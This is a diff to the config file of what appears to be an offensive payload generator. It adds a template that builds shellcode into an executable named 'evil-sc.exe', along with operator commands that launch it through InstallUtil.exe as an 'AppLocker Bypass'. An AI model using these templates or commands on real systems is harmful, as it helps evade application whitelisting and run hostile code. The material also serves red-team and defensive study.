--- a/core/config/config.ini
+++ b/core/config/config.ini
@@ -104,6 +104,13 @@ output_format = .dll
 compiler_args = -r:System.Configuration.Install
 custom_output = Run it using InstallUtil (AppLocker Bypass).\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.dll\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.dll
 
+[windows_cs:InstallUtil]
+expected_format = RAW_BIN
+output_format = .exe
+compiler_args = -r:System.Configuration.Install
+custom_output = Run it using InstallUtil (AppLocker Bypass).\nx64:\nC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe\nx86:\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe
+
+
 [windows_cs:InstallUtilHollow]
 expected_format = RAW_BIN
 output_format = .exe
